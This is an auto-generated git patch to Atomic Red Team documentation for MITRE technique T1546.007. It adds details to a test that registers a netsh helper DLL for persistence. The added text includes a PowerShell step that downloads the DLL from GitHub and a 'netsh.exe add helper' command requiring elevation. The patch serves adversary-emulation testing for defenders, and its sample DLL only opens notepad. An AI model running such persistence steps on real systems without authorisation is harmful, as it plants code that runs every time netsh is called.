From de803e9e5361226c7dc21c4e3accb5f2bd5fac2a Mon Sep 17 00:00:00 2001 From: Atomic Red Team doc generator Date: Fri, 23 Sep 2022 18:16:10 +0000 Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip] --- atomics/Indexes/index.yaml | 48 ++++++++++++++++++++++++++++------ atomics/T1546.007/T1546.007.md | 27 ++++++++++++++++--- 2 files changed, 64 insertions(+), 11 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fe9bbd74..d811c339 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -40929,22 +40929,38 @@ privilege-escalation: atomic_tests: - name: Netsh Helper DLL Registration auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files + description: | + You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. + The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. - ' + [Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) + [Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) supported_platforms: - windows input_arguments: helper_file: description: Path to DLL type: Path - default: C:\Path\file.dll + default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll + dependencies: + - description: 'Helper DLL must exist on disk at specified location (#{helper_file}) + + ' + prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" executor: command: 'netsh.exe add helper #{helper_file} + ' + cleanup_command: 'netsh.exe delete helper #{helper_file} + ' name: command_prompt + elevation_required: true T1574.004: technique: x_mitre_platforms: @@ -63735,22 +63751,38 @@ persistence: atomic_tests: - name: Netsh Helper DLL Registration auto_generated_guid: 3244697d-5a3a-4dfc-941c-550f69f91a4d - description: 'Netsh interacts with other operating system components using dynamic-link - library (DLL) files + description: | + You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. + The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. - ' + [Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) + [Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) supported_platforms: - windows input_arguments: helper_file: description: Path to DLL type: Path - default: C:\Path\file.dll + default: PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll + dependencies: + - description: 'Helper DLL must exist on disk at specified location (#{helper_file}) + + ' + prereq_command: 'if (Test-Path "#{helper_file}") { exit 0} else { exit 1} + + ' + get_prereq_command: | + New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" executor: command: 'netsh.exe add helper #{helper_file} + ' + cleanup_command: 'netsh.exe delete helper #{helper_file} + ' name: command_prompt + elevation_required: true T1505.001: technique: x_mitre_platforms: diff --git a/atomics/T1546.007/T1546.007.md b/atomics/T1546.007/T1546.007.md index 030d6a95..b7315359 100644 --- a/atomics/T1546.007/T1546.007.md +++ b/atomics/T1546.007/T1546.007.md @@ -12,7 +12,11 @@ Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code
## Atomic Test #1 - Netsh Helper DLL Registration -Netsh interacts with other operating system components using dynamic-link library (DLL) files +You can register a "helper dll" with Netsh as a persistance mechanism. The code in the dll is executed every time netsh.exe is called. +The NetshHelper.dll provided with the atomic will simply launch notepad when netsh.exe is run. + +[Blog](https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html) +[Sample DLL code](https://github.com/outflanknl/NetshHelperBeacon) **Supported Platforms:** Windows @@ -26,19 +30,36 @@ Netsh interacts with other operating system components using dynamic-link librar #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| helper_file | Path to DLL | Path | C:\Path\file.dll| +| helper_file | Path to DLL | Path | PathToAtomicsFolder\T1546.007\bin\NetshHelper.dll| -#### Attack Commands: Run with `command_prompt`! +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) ```cmd netsh.exe add helper #{helper_file} ``` +#### Cleanup Commands: +```cmd +netsh.exe delete helper #{helper_file} +``` +#### Dependencies: Run with `command_prompt`! +##### Description: Helper DLL must exist on disk at specified location (#{helper_file}) +##### Check Prereq Commands: +```cmd +if (Test-Path "#{helper_file}") { exit 0} else { exit 1} +``` +##### Get Prereq Commands: +```cmd +New-Item -Type Directory (split-path #{helper_file}) -ErrorAction ignore | Out-Null +Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.007/bin/NetshHelper.dll" -OutFile "#{helper_file}" +``` + +